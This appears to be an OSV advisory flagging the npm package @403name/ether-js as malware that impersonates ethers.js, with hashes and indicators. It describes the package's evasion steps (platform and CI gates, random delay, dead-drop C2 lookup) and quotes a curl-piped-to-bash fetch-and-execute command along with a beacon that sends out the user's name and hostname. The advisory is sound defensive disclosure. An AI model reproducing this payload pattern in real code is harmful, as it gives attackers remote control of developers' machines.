MAL-2026-5548

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/ether-js/MAL-2026-5548.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5548
Published
2026-06-11T03:14:52Z
Modified
2026-06-11T04:01:30.670643837Z
Summary
Malicious code in @403name/ether-js (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (927758f43d6eaa6514273bd8ab8f3559624055b9bbf8c9ef9a190b645c0a6eef)

On require('@403name/ether-js'), index.js runs an IIFE that targets macOS only (returns early on non-darwin and when CI/GITHUB_ACTIONS env vars are set), writes a one-shot marker at ~/.cache/.nyx-npm/e, waits a randomized 30-90s, then fetches a C2 base URL from https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt. It beacons the installer's USER env var and os.hostname() to <c2>/api/clickfix-callback via curl, then spawns '/bin/sh -c' with curl -sSfL <c2>/api/payload/ | /bin/bash (detached, disowned) — full remote code execution on the developer's machine under attacker control. A Russian-language comment in the source explicitly states the design avoids lifecycle scripts to be 'invisible to npm audit'. The package name and description impersonate the popular ethers.js library ('Compatible with ethers.js API patterns for easy migration'), and the shipped keccak256 is a stub returning random hex rather than a real hash, confirming the package is a lure, not a functional library. The evasion pattern (platform gate, CI gate, randomized delay, one-shot marker) combined with the two-stage dead-drop-to-C2 fetch-and-exec is conclusive evidence of malicious intent.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005447",
            "versions": [
                "1.0.1"
            ],
            "sha256": "1b8b80784e81444c1b77d58f0b521b3ddb96f91d634bce1f91a0ff6b2f2547de",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T03:14:52Z",
            "import_time": "2026-06-11T03:48:52.53109909Z"
        },
        {
            "id": "IN-MAL-2026-005450",
            "versions": [
                "1.0.0"
            ],
            "sha256": "927758f43d6eaa6514273bd8ab8f3559624055b9bbf8c9ef9a190b645c0a6eef",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T03:15:08Z",
            "import_time": "2026-06-11T03:48:52.872397817Z"
        }
    ]
}

Affected packages

npm / @403name/ether-js

Package

Name
@403name/ether-js
Purl
pkg:npm/%40403name%2Fether-js

Affected ranges

Affected versions

1.*
1.0.0
1.0.1

Database specific

indicators
{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "fe52919155d4cbef5d801975f9daefa3a2881c12b53b75fccf424422a2d83678",
            "tlsh": "7991a5c8bae77060ba261171462fb41525eef0b302cccd68b56cd1066fe5b289b79df4"
        },
        {
            "path": "package.json",
            "sha256": "875e76bd156ecad8b3b5e88720d3ef0ca1c0312482d8a49e1db235c7ed0e1f14",
            "tlsh": "c4014ca1c6251ca31bdc2dd95e597241b252480749447c1973c7c02e8b8f69f52fe78c"
        }
    ],
    "package_integrity": [
        {
            "filename": "ether-js-1.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-i6hyQS+8GnwaNIUjfFWlI4ztOM7m3wv+d3ial+hhI4lc1aFTC5Q7BY1NPfW3rM8l0sedMR5cOrM/vdHR4v4gFw==",
                "sha1": "335802d372117cd58855351dacbb13641c0e2fda"
            }
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/ether-js/MAL-2026-5548.json"